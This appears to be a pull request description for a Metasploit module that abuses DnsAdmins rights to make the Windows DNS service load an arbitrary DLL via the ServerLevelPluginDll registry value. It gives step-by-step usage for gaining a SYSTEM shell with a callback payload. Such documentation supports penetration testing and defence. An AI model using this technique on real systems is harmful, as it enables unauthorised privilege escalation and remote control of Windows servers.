       # https://support.microsoft.com/en-us/help/4046019/guest-access-in-smb2-disabled-by-default-in-windows-10-and-windows-ser


### PR DESCRIPTION
This module exploits a feature in the DNS service of Windows Server. Users of the DnsAdmins group can set the
`ServerLevelPluginDll` value using dnscmd.exe to create a registry key at `HKLM\SYSTEM\CurrentControlSet\services\DNS\Parameters\`
named `ServerLevelPluginDll` that can be made to point to an arbitrary DLL. After doing so, restarting the service will load the DLL
and cause it to execute, providing us with SYSTEM privileges. Increasing WfsDelay is recommended when using a UNC path.

### Targets
Windows Server 2003 and above

## Verification
1. Get a Meterpreter shell
2. `use exploit/windows/local/dnsadmin_serverlevelplugindll`
3. `set PAYLOAD <payload>`. Payload architecture must be the same as the target system
4. `set LHOST <lhost>`
5. `set LPORT <lport>`
6. `set SESSION <session_no>` to specify session
7. `set DLLNAME <dllname>` if you want to name your DLL something other than `msf.dll`
8. `set DLLPATH <dllpath>` if you want to place your DLL somewhere other than `%TEMP%` or want to use a UNC path
9. `set MAKEDLL true` if you want to just make the DLL, and not carry out the exploit
10. `exploit` to get SYSTEM shell if `MAKEDLL` is set to `false`, or to write the DLL to the `~/.msf4/local` folder if `MAKEDLL` is set to `true`

TODO:

- [x] Deleting DLL after execution
- [x] Option to generate standalone DLL for use with a remote UNC path